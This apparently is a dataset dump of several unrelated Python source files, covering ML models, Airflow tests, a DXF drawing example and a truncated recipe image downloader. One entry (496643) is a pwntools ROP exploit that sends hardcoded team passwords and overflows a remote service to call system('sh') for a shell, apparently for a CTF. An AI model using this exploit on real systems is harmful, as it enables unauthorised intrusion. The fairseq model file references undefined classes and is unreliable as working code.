id
stringlengths 3
8
| content
stringlengths 100
981k
|
---|---|
496597 | import torch
from rlil.nn import RLNetwork
from .approximation import Approximation
class Discriminator(Approximation):
def __init__(
self,
model,
optimizer,
name='discriminator',
**kwargs
):
model = DiscriminatorModule(model)
super().__init__(
model,
optimizer,
name=name,
**kwargs
)
def expert_reward(self, features):
rew = torch.log(self.model(features)) - \
torch.log(1 - self.model(features))
return rew.squeeze().detach()
class DiscriminatorModule(RLNetwork):
def forward(self, features):
return self.model(features)
|
496609 | import tensorflow as tf
from .math import sparse_tensor_diag_matmul, sparse_scalar_multiply
def rescaled_laplacian(adj):
"""Creates a tensorflow (rescale) laplacian matrix out of a
SparseTensorValue adjacency matrix."""
degree = tf.sparse_reduce_sum(adj, axis=1)
degree = tf.cast(degree, tf.float32)
degree = tf.pow(degree, -0.5)
lap = sparse_tensor_diag_matmul(adj, degree, transpose=True)
lap = sparse_tensor_diag_matmul(lap, degree, transpose=False)
return sparse_scalar_multiply(lap, -1)
|
496617 | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from fairseq import utils
from fairseq.models import (
FairseqModel, FairseqEncoder, FairseqIncrementalDecoder,
register_model, register_model_architecture,
)
from examples.pervasive.module import (
build_convnet, build_aggregator,
)
from fairseq.modules import (
SinusoidalPositionalEmbedding,
LearnedPositionalEmbedding,
)
@register_model('attn2d_waitk')
class Attn2dWaitkModel(FairseqEncoderDecoderModel):
def __init__(self, encoder, decoder):
super().__init__(encoder, decoder)
def get_lenx(self, encoder_out):
return encoder_out['encoder_out'].size(1)
@staticmethod
def add_args(parser):
""" Add model-specific arguments to the parser. """
""" Embeddings """
parser.add_argument('--pooling-policy', type=str, default='row',
help='Policy for pooling the grid')
parser.add_argument('--skip-output-mapping', action='store_true',
help='remove the final mapping if equal dimension')
parser.add_argument('--share-all-embeddings', action='store_true',
help='share encoder, decoder and output embeddings'
' (requires shared dictionary and embed dim)')
parser.add_argument('--share-decoder-input-output-embed', action='store_true',
help='share decoder input and output embeddings')
parser.add_argument('--add-positional-embeddings', default=False, action='store_true',
help='if set, enables positional embeddings')
parser.add_argument('--learned-pos', action='store_true',
help='use learned positional embeddings')
parser.add_argument('--encoder-embed-path', type=str, metavar='STR',
help='path to pre-trained encoder embedding')
parser.add_argument('--decoder-embed-path', type=str, metavar='STR',
help='path to pre-trained decoder embedding')
parser.add_argument('--encoder-embed-dim', type=int, metavar='N',
help='encoder embedding dimension')
parser.add_argument('--decoder-embed-dim', type=int, metavar='N',
help='decoder embedding dimension')
parser.add_argument('--ffn-dim', type=int,
help='ffn dimension')
parser.add_argument('--reduce-dim', type=int,
help='first conv output dimension')
parser.add_argument('--double-masked', action='store_true',
help='Mask the future source as well')
parser.add_argument('--conv-groups', type=int,
help='convolution groups')
parser.add_argument('--source-dilation', default=1, type=int,
help='2nd dimension dilation')
parser.add_argument('--target-dilation', default=1, type=int,
help='1st dimension dilation')
parser.add_argument('--conv-stride', default=1, type=int,
help='2nd dimension stride')
parser.add_argument('--maintain-resolution', default=1, type=int,
help='pad so that the output dimension matches the input')
parser.add_argument('--output-dim', type=int,
help='pre-softmax output dimension')
parser.add_argument('--embeddings-ln', action='store_true',
help='add LN after the embeddings')
parser.add_argument('--network', type=str, metavar='STR',
help='Type of cnv net between denseNet or resNet')
parser.add_argument('--blocks', type=str, metavar='STR',
help='specific architecture that overwrites the kernel, growth...')
parser.add_argument('--kernel-size', type=int,
help='kernel size')
parser.add_argument('--bn-size', type=int,
help='bn size in the dense layer')
parser.add_argument('--growth-rate', type=int,
help='growth rate')
parser.add_argument('--num-layers', type=int,
help='number of layers')
parser.add_argument('--convolution-dropout', type=float, metavar='D',
help='dropout probability in the conv layers')
parser.add_argument('--input-dropout', type=float, metavar='D',
help='dropout probability on the initial 2d input')
parser.add_argument('--embeddings-dropout', type=float, metavar='D',
help='dropout probability on the embeddings')
parser.add_argument('--prediction-dropout', type=float, metavar='D',
help='dropout on the final prediction layer')
parser.add_argument('--init-weights', type=str, metavar='STR',
help='the type of weight initialiation')
parser.add_argument('--divide-channels', type=int, metavar='INT',
help='the factor to reduce the input channels by')
parser.add_argument('--skip-last-trans', type=bool,
help='whether to transition at the last layer')
parser.add_argument('--memory-efficient', action='store_true',
help='use checkpointing')
parser.add_argument('--trans-norm', type=bool,
help='transition batch norm')
parser.add_argument('--final-norm', type=bool,
help='final batch norm')
parser.add_argument('--layer1-norm', type=bool,
help='first layer batch norm')
parser.add_argument('--layer2-norm', type=bool,
help='second layer batch norm')
parser.add_argument('--initial-shift', type=int, default=3,
help='Initial shift')
parser.add_argument('--read-normalization', type=str, default='max',
help='Normalization of the read/write proba from the softmax over the full vocabulary')
parser.add_argument('--waitk-policy', type=str, default='path',
help='The type of fixed policy with fixed mnaginals')
parser.add_argument('--waitk', type=int, default=3,
help='Fixed policy shift')
parser.add_argument('--waitk-delta', type=int, default=1,
help='Fixed policy stepsize')
parser.add_argument('--waitk-catchup', type=int, default=1,
help='Fixed policy catchup')
def log_tensorboard(self, writer, iter):
pass
@classmethod
def build_model(cls, args, task):
""" Build a new model instance. """
base_architecture(args)
if not hasattr(args, 'max_source_positions'):
args.max_source_positions = 1024
if not hasattr(args, 'max_target_positions'):
args.max_target_positions = 1024
src_dict, tgt_dict = task.source_dictionary, task.target_dictionary
def build_embedding(dictionary, embed_dim, path=None):
num_embeddings = len(dictionary)
padding_idx = dictionary.pad()
emb = Embedding(num_embeddings, embed_dim, padding_idx)
# if provided, load from preloaded dictionaries
if path:
embed_dict = utils.parse_embedding(path)
utils.load_embedding(embed_dict, dictionary, emb)
return emb
if args.share_all_embeddings:
if src_dict != tgt_dict:
raise RuntimeError('--share-all-embeddings requires a joined dictionary')
if args.encoder_embed_dim != args.decoder_embed_dim:
raise RuntimeError(
'--share-all-embeddings requires --encoder-embed-dim to match --decoder-embed-dim')
if args.decoder_embed_path and (
args.decoder_embed_path != args.encoder_embed_path):
raise RuntimeError('--share-all-embeddings not compatible with --decoder-embed-path')
encoder_embed_tokens = build_embedding(
src_dict, args.encoder_embed_dim, args.encoder_embed_path
)
decoder_embed_tokens = encoder_embed_tokens
args.share_decoder_input_output_embed = True
else:
encoder_embed_tokens = build_embedding(
src_dict, args.encoder_embed_dim, args.encoder_embed_path
)
decoder_embed_tokens = build_embedding(
tgt_dict, args.decoder_embed_dim, args.decoder_embed_path
)
encoder = Attn2dEncoder(args, src_dict, encoder_embed_tokens)
decoder = Attn2dDecoder(args, tgt_dict, decoder_embed_tokens)
return cls(encoder, decoder)
def max_decoder_positions(self):
""" Maximum input length supported by the decoder """
return self.decoder.max_target_positions
class Attn2dEncoder(FairseqEncoder):
def __init__(self, args, dictionary, embed_tokens, left_pad=False):
super().__init__(dictionary)
embed_dim = embed_tokens.embedding_dim
self.padding_idx = embed_tokens.padding_idx
self.max_source_positions = args.max_source_positions
self.embed_tokens = embed_tokens
self.embed_scale = math.sqrt(embed_dim)
self.embed_positions = PositionalEmbedding(
self.max_source_positions, embed_dim, self.padding_idx,
left_pad=left_pad,
learned=args.learned_pos,
) if args.add_positional_embeddings else None
self.ln = lambda x: x
if args.embeddings_ln:
self.ln = nn.LayerNorm(embed_dim, elementwise_affine=True)
self.embedding_dropout = nn.Dropout(args.embeddings_dropout)
def forward(self, src_tokens, src_lengths=None, **kwargs):
x = self.embed_scale * self.embed_tokens(src_tokens)
if self.embed_positions is not None:
x += self.embed_positions(src_tokens)
x = self.ln(x)
x = self.embedding_dropout(x)
encoder_padding_mask = src_tokens.eq(self.padding_idx)
return {
'encoder_out': x, # B, Ts
'encoder_padding_mask': encoder_padding_mask # B, Ts
}
def max_positions(self):
"""Maximum input length supported by the encoder."""
if self.embed_positions is None:
return self.max_source_positions
return min(self.max_source_positions, self.embed_positions.max_positions())
def reorder_encoder_out(self, encoder_out, new_order):
"""
Reorder encoder output according to *new_order*.
Args:
encoder_out: output from the ``forward()`` method
new_order (LongTensor): desired order
Returns:
*encoder_out* rearranged according to *new_order*
"""
if encoder_out['encoder_out'] is not None:
encoder_out['encoder_out'] = \
encoder_out['encoder_out'].index_select(0, new_order)
if encoder_out['encoder_padding_mask'] is not None:
encoder_out['encoder_padding_mask'] = \
encoder_out['encoder_padding_mask'].index_select(0, new_order)
return encoder_out
class Attn2dDecoder(FairseqIncrementalDecoder):
""" Pervasive Attention Model """
def __init__(self, args, dictionary, embed_tokens, left_pad=False):
super().__init__(dictionary)
self.share_input_output_embed = args.share_decoder_input_output_embed
embed_dim = embed_tokens.embedding_dim
self.padding_idx = embed_tokens.padding_idx
self.eos = dictionary.eos()
self.max_target_positions = args.max_target_positions
self.embed_tokens = embed_tokens
self.embed_scale = math.sqrt(embed_dim)
self.embed_positions = PositionalEmbedding(
args.max_target_positions, embed_dim, self.padding_idx,
left_pad=False,
learned=args.learned_pos,
) if args.add_positional_embeddings else None
self.ln = lambda x: x
if args.embeddings_ln:
self.ln = nn.LayerNorm(embed_dim, elementwise_affine=True)
self.embedding_dropout = nn.Dropout(args.embeddings_dropout)
self.input_dropout = nn.Dropout(args.input_dropout)
self.input_channels = args.encoder_embed_dim + args.decoder_embed_dim
self.output_dim = args.output_dim
self.kernel_size = args.kernel_size
print('Input channels:', self.input_channels)
self.net = build_convnet(args)
if args.network == 'densenet':
self.net = DenseNet_CP(self.input_channels, args)
elif args.network == 'resnet':
self.net = ResNet3(self.input_channels, args)
elif args.network == 'resnet_addup':
self.net = ResNetAddUp2(self.input_channels, args)
elif args.network == 'resnet_addup_nonorm':
self.net = ResNetAddUpNoNorm(self.input_channels, args)
else:
raise ValueError('Unknown architecture %s' % args.network)
self.output_channels = self.net.output_channels
print('Output channels:', self.output_channels)
self.decoder_dim = args.decoder_embed_dim
if args.pooling_policy == 'row':
self.pool_and_select_context = RowPool(args)
else:
raise ValueError('Unknown pooling strategy %s' % args.pooling_policy)
if not self.output_dim == self.decoder_dim or not args.skip_output_mapping:
self.projection = Linear(self.decoder_dim, self.output_dim,
dropout=args.prediction_dropout)
else:
self.projection = None
print('Projection layer:', self.projection)
self.prediction_dropout = nn.Dropout(args.prediction_dropout)
self.vocab_size = len(dictionary)
self.prediction_dropout = nn.Dropout(args.prediction_dropout)
if self.share_input_output_embed:
self.prediction = Linear(self.decoder_dim, len(dictionary))
self.prediction.weight = self.embed_tokens.weight
else:
self.prediction = Linear(self.output_dim, len(dictionary))
def forward(self, prev_output_tokens, encoder_out, incremental_state=None,
context_size=None, cache_decoder=True,
**kwargs):
# source embeddings
src_emb = encoder_out['encoder_out'].clone() # N, Ts, ds
Ts = src_emb.size(1)
if context_size is not None:
if context_size < Ts:
# src_emb[:, context_size:] = 0
src_emb = src_emb.clone()[:, :context_size]
# target embeddings:
positions = self.embed_positions(
prev_output_tokens,
incremental_state=incremental_state if cache_decoder else None,
) if self.embed_positions is not None else None
if incremental_state is not None and cache_decoder:
# embed the last target token
prev_output_tokens = prev_output_tokens[:, -1:]
if positions is not None:
positions = positions[:, -1:]
# Build the full grid
tgt_emb = self.embed_scale * self.embed_tokens(prev_output_tokens)
if positions is not None:
tgt_emb += positions
tgt_emb = self.ln(tgt_emb)
tgt_emb = self.embedding_dropout(tgt_emb)
src_length = src_emb.size(1)
tgt_length = tgt_emb.size(1)
# build 2d "image" of embeddings
src_emb = _expand(src_emb, 1, tgt_length) # N, Tt, Ts, ds
tgt_emb = _expand(tgt_emb, 2, src_length) # N, Tt, Ts, dt
x = torch.cat((src_emb, tgt_emb), dim=3) # N, Tt, Ts, C=ds+dt
x = self.input_dropout(x)
# pass through dense convolutional layers
x = self.net(x, incremental_state if cache_decoder else None) # N, Tt, Ts, C
if incremental_state is not None:
# Keep only the last step:
x = x[:, -1:]
# if context_size is not None and context_size < Ts:
# x, _ = x[:, :, :context_size].max(dim=2) # N, Tt, C
# else:
x, _ = x.max(dim=2) # N, Tt, C
x = self.projection(x) if self.projection is not None else x # N, Tt, C
x = self.prediction_dropout(x)
# multiply by embedding matrix to generate distribution
x = self.prediction(x) # N, Tt, V
return x, None
# Training:
# progressive pooling:
x = self.pool_and_select_context(x, encoder_out['encoder_padding_mask']) # N, Tt, k, C
if isinstance(x, torch.Tensor):
x = self.projection(x) if self.projection is not None else x # N, Tt, k, C
x = self.prediction_dropout(x)
x = self.prediction(x) # N, Tt, k, C
else:
x = [self.projection(sub) if self.projection is not None else sub
for sub in x] # N, Tt, k, C
x = [self.prediction_dropout(sub) for sub in x]
x = [self.prediction(sub) for sub in x] # list of (N, k, C ) * Tt
return x, None
def forward_one_with_update(self, prev_output_tokens, encoder_out, context_size,
incremental_state=None, **kwargs):
"""
Update the previously emitted tokens states
"""
# Truncate the encoder outputs:
encoder_out_truncated = {'encoder_out': encoder_out['encoder_out'].clone()[:,:context_size]}
# source embeddings
src_emb = encoder_out_truncated['encoder_out'] # N, Ts, ds
# target embeddings:
positions = self.embed_positions(
prev_output_tokens,
incremental_state=None,
) if self.embed_positions is not None else None
# limit to the used context:
# if incremental_state is not None:
# hist = min(prev_output_tokens.size(1), self.kernel_size // 2)
# prev_output_tokens = prev_output_tokens#[:, -hist:]
# if positions is not None:
# positions = positions#[:, -hist:]
# Build the full grid
tgt_emb = self.embed_scale * self.embed_tokens(prev_output_tokens)
if positions is not None:
tgt_emb += positions
tgt_emb = self.ln(tgt_emb)
tgt_emb = self.embedding_dropout(tgt_emb)
src_length = src_emb.size(1)
tgt_length = tgt_emb.size(1)
# build 2d "image" of embeddings
src_emb = _expand(src_emb, 1, tgt_length) # N, Tt, Ts, ds
tgt_emb = _expand(tgt_emb, 2, src_length) # N, Tt, Ts, dt
x = torch.cat((src_emb, tgt_emb), dim=3) # N, Tt, Ts, C=ds+dt
x = self.input_dropout(x)
# pass through dense convolutional layers
# Limit to the used context:
x = self.net(x) # N, Tt, Ts, C
# Only the last step:
x = x[:, -1:]
# aggregate predictions and project into embedding space
x, _ = x.max(dim=2) # N, Tt, C
x = self.projection(x) if self.projection is not None else x # N, Tt, C
x = self.prediction_dropout(x)
# multiply by embedding matrix to generate distribution
x = self.prediction(x) # N, Tt, V
return x, {'attn': None}
def forward_one(self, prev_output_tokens, encoder_out, context_size,
incremental_state=None, **kwargs):
"""
Keep the previously emitted tokens states asis
"""
# Truncate the encoder outputs:
encoder_out_truncated = {'encoder_out': encoder_out['encoder_out'].clone()[:,:context_size]}
# source embeddings
src_emb = encoder_out_truncated['encoder_out'] # N, Ts, ds
# target embeddings:
positions = self.embed_positions(
prev_output_tokens,
incremental_state=incremental_state,
) if self.embed_positions is not None else None
if incremental_state is not None:
# embed the last target token
prev_output_tokens = prev_output_tokens[:, -1:]
if positions is not None:
positions = positions[:, -1:]
# Build the full grid
tgt_emb = self.embed_scale * self.embed_tokens(prev_output_tokens)
if positions is not None:
tgt_emb += positions
tgt_emb = self.ln(tgt_emb)
tgt_emb = self.embedding_dropout(tgt_emb)
src_length = src_emb.size(1)
tgt_length = tgt_emb.size(1)
# build 2d "image" of embeddings
src_emb = _expand(src_emb, 1, tgt_length) # N, Tt, Ts, ds
tgt_emb = _expand(tgt_emb, 2, src_length) # N, Tt, Ts, dt
x = torch.cat((src_emb, tgt_emb), dim=3) # N, Tt, Ts, C=ds+dt
x = self.input_dropout(x)
# pass through dense convolutional layers
x = self.net(x, incremental_state) # N, Tt, Ts, C
# aggregate predictions and project into embedding space
x, _ = x.max(dim=2) # N, Tt, C
x = self.projection(x) if self.projection is not None else x # N, Tt, C
x = self.prediction_dropout(x)
# multiply by embedding matrix to generate distribution
x = self.prediction(x) # N, Tt, V
return x, {'attn': None}
def forward_one_old(self, prev_output_tokens, encoder_out, context_size,
incremental_state=None, **kwargs):
# Truncate the encoder outputs:
encoder_out_truncated = {'encoder_out': encoder_out['encoder_out'].clone()[:,:context_size]}
# source embeddings
src_emb = encoder_out_truncated['encoder_out'] # N, Ts, ds
# target embeddings:
positions = self.embed_positions(
prev_output_tokens,
incremental_state=incremental_state,
) if self.embed_positions is not None else None
if incremental_state is not None:
# embed the last target token
prev_output_tokens = prev_output_tokens[:, -1:]
if positions is not None:
positions = positions[:, -1:]
# Build the full grid
tgt_emb = self.embed_scale * self.embed_tokens(prev_output_tokens)
if positions is not None:
tgt_emb += positions
tgt_emb = self.ln(tgt_emb)
tgt_emb = self.embedding_dropout(tgt_emb)
src_length = src_emb.size(1)
tgt_length = tgt_emb.size(1)
# build 2d "image" of embeddings
src_emb = _expand(src_emb, 1, tgt_length) # N, Tt, Ts, ds
tgt_emb = _expand(tgt_emb, 2, src_length) # N, Tt, Ts, dt
x = torch.cat((src_emb, tgt_emb), dim=3) # N, Tt, Ts, C=ds+dt
x = self.input_dropout(x)
# pass through dense convolutional layers
x = self.net(x, incremental_state) # N, Tt, Ts, C
# progressive pooling:
# x = self.pool(x, encoder_out['encoder_padding_mask']) # B x C x Tt x Ts
x, _ = x.max(dim=2) # N, Tt, C
x = self.projection(x) if self.projection is not None else x # N, Tt, C
x = self.prediction_dropout(x)
# multiply by embedding matrix to generate distribution
x = self.prediction(x) # N, Tt, V
return x, {'attn': None}
@register_model_architecture('attn2d_waitk', 'attn2d_waitk')
def base_architecture(args):
args.memory_efficient = getattr(args, 'memory_efficient', False)
args.skip_output_mapping = getattr(args, 'skip_output_mapping', False)
args.encoder_embed_path = getattr(args, 'encoder_embed_path', None)
args.decoder_embed_path = getattr(args, 'decoder_embed_path', None)
args.share_decoder_input_output_embed = getattr(
args, 'share_decoder_input_output_embed', False
)
args.share_all_embeddings = getattr(args, 'share_all_embeddings', False)
args.embeddings_dropout = getattr(args, 'embeddings_dropout', 0.)
args.encoder_embed_dim = getattr(args, 'encoder_embed_dim', 256)
args.decoder_embed_dim = getattr(args, 'decoder_embed_dim', 256)
args.ffn_dim = getattr(args, 'ffn_dim', 512)
args.output_dim = getattr(args, 'output_dim', args.decoder_embed_dim)
args.divide_channels = getattr(args, 'divide_channels', 2)
args.reduce_dim = getattr(args, 'reduce_dim',
(args.encoder_embed_dim + args.decoder_embed_dim) // args.divide_channels)
args.conv_groups = getattr(args, 'conv_groups', args.reduce_dim)
args.conv_stride = getattr(args, 'conv_stride', 1)
args.source_dilation = getattr(args, 'source_dilation', 1)
args.target_dilation = getattr(args, 'target_dilation', 1)
args.maintain_resolution = getattr(args, 'maintain_resolution', 1)
args.add_positional_emnbeddings = getattr(args, 'add_positional_embeddings', False)
args.learned_pos = getattr(args, 'learned_pos', False)
args.embeddings_ln = getattr(args, 'embeddings_ln', False)
args.input_dropout = getattr(args, 'input_dropout', 0.2)
args.convolution_dropout = getattr(args, 'convolution_dropout', 0.2)
args.network = getattr(args, 'network', 'densenet')
args.kernel_size = getattr(args, 'kernel_size', 3)
args.num_layers = getattr(args, 'num_layers', 24)
args.divide_channels = getattr(args, 'divide_channels', 2)
args.prediction_dropout = getattr(args, 'prediction_dropout', 0.2)
args.double_masked = getattr(args, 'double_masked', True)
def _expand(tensor, dim, reps):
tensor = tensor.unsqueeze(dim)
shape = tuple(reps if i == dim else -1 for i in range(tensor.dim()))
return tensor.expand(shape)
def PositionalEmbedding(num_embeddings, embedding_dim,
padding_idx, left_pad, learned=False):
if learned:
m = LearnedPositionalEmbedding(num_embeddings + padding_idx + 1,
embedding_dim, padding_idx, left_pad)
nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5)
nn.init.constant_(m.weight[padding_idx], 0)
else:
m = SinusoidalPositionalEmbedding(embedding_dim, padding_idx, left_pad,
num_embeddings + padding_idx + 1)
return m
def Embedding(num_embeddings, embedding_dim, padding_idx):
m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx)
nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5)
nn.init.constant_(m.weight[padding_idx], 0)
return m
def Linear(in_features, out_features, dropout=0., bias=True):
m = nn.Linear(in_features, out_features, bias=bias)
nn.init.normal_(m.weight, mean=0,
std=math.sqrt((1 - dropout) / in_features))
nn.init.constant_(m.bias, 0)
return m
class RowPool(nn.Module):
"""
Pool the row features
input shape N, Tt, Ts, C
"""
def __init__(self, args):
super(RowPool, self).__init__()
self.policy = args.waitk_policy
self.waitk = args.waitk
self.delta = args.waitk_delta
self.catchup = args.waitk_catchup
def forward(self, X, src_mask=None):
if self.policy == 'path':
return self.forward_path(X)
if self.policy == 'above':
return self.forward_above(X)
def forward_path(self, X):
N, Tt, Ts, C = X.size()
XpoolSelect = []
for t in range(Tt):
ctx = min((t // self.catchup * self.delta) + self.waitk, Ts)
feat, _ = torch.max(X[:, t:t+1, :ctx], dim=2, keepdim=True)
XpoolSelect.append(feat)
return torch.cat(XpoolSelect, dim=1)
def forward_above(self, X):
N, Tt, Ts, C = X.size()
XpoolSelect = []
for t in range(Tt):
ctx = min((t // self.catchup * self.delta) + self.waitk, Ts)
tfeats = []
for ctxplus in range(ctx, Ts+1):
feat, _ = torch.max(X[:, t, :ctxplus], dim=1, keepdim=True)
tfeats.append(feat)
feat = torch.cat(tfeats, dim=1)
XpoolSelect.append(feat)
return XpoolSelect
|
496643 | from pwn import *
import sys
team = int(sys.argv[2])
p = remote(sys.argv[1], 5000 + team)
greeting = 0x493018
pop_x19 = 0x400790
mov_x0_x19 = 0x400788
system = 0x400e38
fill = 0x4141414141414141
if team == 0:
p.send("letmeinplz\n")
elif team == 1:
p.send("letmein181\n")
elif team == 2:
p.send("letmein244\n")
elif team == 3:
p.send("letmein364\n")
elif team == 4:
p.send("letmein474\n")
rop = p64(pop_x19) + "A"*0x100
rop += p64(fill) + p64(mov_x0_x19) + p64(greeting) + p64(fill) + p64(fill) + p64(fill) + p64(fill) + "A"*0x68
rop += p64(fill) + p64(system)
cmd = "sh\x00"
payload = cmd + "A" * (0x110 - len(cmd)) + rop
while len(payload) > 0:
p.send("3\n")
p.send(payload.replace('\x00', 'A') + "\n")
zero = payload.rfind('\x00')
if zero == -1:
break
payload = payload[0:zero]
p.send("5\n")
p.interactive()
|
496652 | import pathlib
import pandas as pd
import pytest
from airflow.decorators import task
from astro import sql as aql
from astro.files import File
from astro.sql.operators.sql_decorator_legacy import transform_decorator as transform
from astro.sql.table import Table
from tests.sql.operators import utils as test_utils
cwd = pathlib.Path(__file__).parent
@pytest.mark.parametrize(
"sql_server",
[
"snowflake",
"postgres",
"bigquery",
"sqlite",
],
indirect=True,
)
def test_dataframe_transform(sql_server, sample_dag, test_table):
print("test_dataframe_to_database")
@aql.dataframe
def get_dataframe():
return pd.DataFrame({"numbers": [1, 2, 3], "colors": ["red", "white", "blue"]})
@transform
def sample_pg(input_table: Table):
return "SELECT * FROM {{input_table}}"
@aql.dataframe
def validate_dataframe(df: pd.DataFrame):
df.columns = df.columns.str.lower()
df = df.sort_values(by=df.columns.tolist()).reset_index(drop=True)
assert df.equals(
pd.DataFrame({"numbers": [1, 2, 3], "colors": ["red", "white", "blue"]})
)
with sample_dag:
my_df = get_dataframe(output_table=test_table)
pg_df = sample_pg(my_df)
validate_dataframe(pg_df)
test_utils.run_dag(sample_dag)
@pytest.mark.parametrize(
"sql_server",
[
"snowflake",
"postgres",
"bigquery",
"sqlite",
],
indirect=True,
)
def test_transform(sql_server, sample_dag, test_table):
@transform
def sample_function(input_table: Table):
return "SELECT * FROM {{input_table}} LIMIT 10"
@aql.dataframe
def validate_table(df: pd.DataFrame):
assert len(df) == 10
with sample_dag:
homes_file = aql.load_file(
input_file=File(path=str(cwd) + "/../../../data/homes.csv"),
output_table=test_table,
)
first_model = sample_function(
input_table=homes_file,
)
inherit_model = sample_function(
input_table=first_model,
)
validate_table(inherit_model)
test_utils.run_dag(sample_dag)
@pytest.mark.parametrize(
"sql_server",
[
"snowflake",
"postgres",
"bigquery",
"sqlite",
],
indirect=True,
)
def test_raw_sql(sql_server, sample_dag, test_table):
@transform(raw_sql=True)
def raw_sql_query(my_input_table: Table, created_table: Table, num_rows: int):
return "SELECT * FROM {{my_input_table}} LIMIT {{num_rows}}"
@task
def validate_raw_sql(cur):
print(cur)
with sample_dag:
homes_file = aql.load_file(
input_file=File(path=str(cwd) + "/../../../data/homes.csv"),
output_table=test_table,
)
raw_sql_result = (
raw_sql_query(
my_input_table=homes_file,
created_table=test_table,
num_rows=5,
handler=lambda cur: cur.fetchall(),
),
)
validate_raw_sql(raw_sql_result)
test_utils.run_dag(sample_dag)
|
496655 | from abc import ABC, abstractmethod
class ModelAdaptor(ABC):
"""
Provides a unified interface for all emulation engines within ESEm.
Concrete classes must implement both :meth:`train` and :meth:`predict` methods.
See the `API documentation <../api.html#dataprocessor>`_ for a list of concrete
classes implementing this interface.
"""
def __init__(self, model):
self.model = model
@abstractmethod
def train(self, training_params, training_data, verbose=False, **kwargs):
"""
Train on the training data
:return:
"""
@abstractmethod
def predict(self, *args, **kwargs):
"""
This is either the tf model which can be called directly, or a generator over the model.predict (in tf,
so it's quick).
:return:
"""
class SKLearnModel(ModelAdaptor):
"""
A wrapper around `scikit-learn <https://scikit-learn.org>`_ models.
"""
def train(self, training_params, training_data, verbose=False, **kwargs):
"""
Train the RF model. Note that this scikit
implementation can't take advantage of GPUs.
"""
if verbose:
self.model.verbose = 1
self.model.fit(X=training_params, y=training_data, **kwargs)
def predict(self, *args, **kwargs):
# Requires X_pred to be of shape (n_samples, n_features)
return self.model.predict(*args, **kwargs), None
class KerasModel(ModelAdaptor):
"""
A wrapper around `Keras <https://keras.io/>`_ models
"""
def train(self, training_params, training_data, verbose=False, epochs=100, batch_size=8, validation_split=0.2, **kwargs):
"""
Train the Keras model.
:param X:
:param verbose:
:param epochs:
:param batch_size:
:param float validation_split: The proportion of training data to use for validation
:return:
"""
self.model.fit(training_params, training_data,
batch_size=batch_size, epochs=epochs,
validation_split=validation_split, **kwargs)
def predict(self, *args, **kwargs):
# This only works with the tf.keras API
return self.model(*args, **kwargs), None
class GPFlowModel(ModelAdaptor):
"""
A wrapper around `GPFlow <https://gpflow.readthedocs.io/en/master/#>`_ regression models
"""
def train(self, training_params, training_data, verbose=False, maxiter=100, **kwargs):
import gpflow
# Uses L-BFGS-B by default
opt = gpflow.optimizers.Scipy()
opt.minimize(self.model.training_loss,
variables=self.model.trainable_variables,
options=dict(disp=verbose, maxiter=maxiter), **kwargs)
def predict(self, *args, **kwargs):
return self.model.predict_y(*args, **kwargs)
|
496715 | import unittest
from katas.kyu_7.a_rule_of_divisibility_by_13 import thirt
class ThirtTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(thirt(1234567), 87)
def test_equals_2(self):
self.assertEqual(thirt(321), 48)
def test_equals_3(self):
self.assertEqual(thirt(8529), 79)
def test_equals_4(self):
self.assertEqual(thirt(85299258), 31)
def test_equals_5(self):
self.assertEqual(thirt(5634), 57)
def test_equals_6(self):
self.assertEqual(thirt(1111111111), 71)
def test_equals_7(self):
self.assertEqual(thirt(987654321), 30)
|
496742 | import os
import re
import ast
from setuptools import setup
import PySignal
with open('PySignal.py', 'rb') as f:
contents = f.read().decode('utf-8')
def parse(pattern):
return re.search(pattern, contents).group(1).replace('"', '').strip()
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
version = parse(r'__version__\s+=\s+(.*)')
author = parse(r'__author__\s+=\s+(.*)')
email = parse(r'__email__\s+=\s+(.*)')
classifiers = [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.5",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Utilities"
]
setup(
name="PySignal",
version=version,
description="Python Signal Library to mimic the Qt Signal system for event driven connections",
author=author,
author_email=email,
url="https://github.com/dgovil/PySignal",
license="MIT",
zip_safe=False,
py_modules=["PySignal"],
classifiers=classifiers,
keywords=['signals', 'qt', 'events']
)
|
496768 | import ezdxf
"""Começa configuração do desenho."""
# Cria um novo desenho
dwg = ezdxf.new(dxfversion='AC1032')
# Endereçar o layout do desenho
msp = dwg.modelspace()
"""Adiciona elementos ao layout."""
# Adiciona um traço no layout
msp.add_line(start=(5, 0), end=(5, 10))
# Adiciona um retângulo
retangulo = [(-20, 0), (0, 0), (0, 10), (-20, 10)]
msp.add_lwpolyline(
points=retangulo,
dxfattribs={'closed': True}
)
# Adiciona um triângulo
triangulo = [(50, -20), (90, -20), (70, 0)]
msp.add_lwpolyline(points=triangulo)
# Adiciona um círculo
msp.add_circle(center=(-10, -50), radius=20.5)
# Adiciona um texto
msp.add_text(
text="Live de Python",
dxfattribs={'height': 5, 'color': 5}
).set_pos((0, -10))
"""Finaliza e salva o desenho."""
# Salva o desenho em arquivo
dwg.saveas(filename='exemplo_1.dxf')
|
496775 | from os import path
import argparse
import json
import urllib
import urllib.request
import config
from utils import URL_to_filename
def load_recipes(filename):
"""Load recipes from disk as JSON
"""
with open(path.join(config.path_data, filename), 'r') as f:
recipes_raw = json.load(f)
print('{:,} recipes loaded from disk.'.format(len(recipes_raw)))
return recipes_raw
def save_picture(recipes_raw, url):
recipe = recipes_raw[url]
path_save = path.join(
config.path_img, '{}.jpg'.format(URL_to_filename(url)))
if not path.isfile(path_save):
if 'picture_link' in recipe:
link = recipe['picture_link']
if link is not None:
try:
if 'epicurious' in url:
img_url = 'https://{}'.format(link[2:])
urllib.request.urlretrieve(img_url, path_save)
else:
urllib.request.urlretrieve(link, path_save)
except:
print('Could not download image from {}'.format(link))
def main(filename, status_interval=500):
recipes_raw = load_recipes(filename=filename)
n = len(recipes_raw)
for i, r in enumerate(recipes_raw.keys()):
save_picture(recipes_raw, r)
if i % status_interval == 0:
print('Downloading image {:,} of {:,}'.format(i, n))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
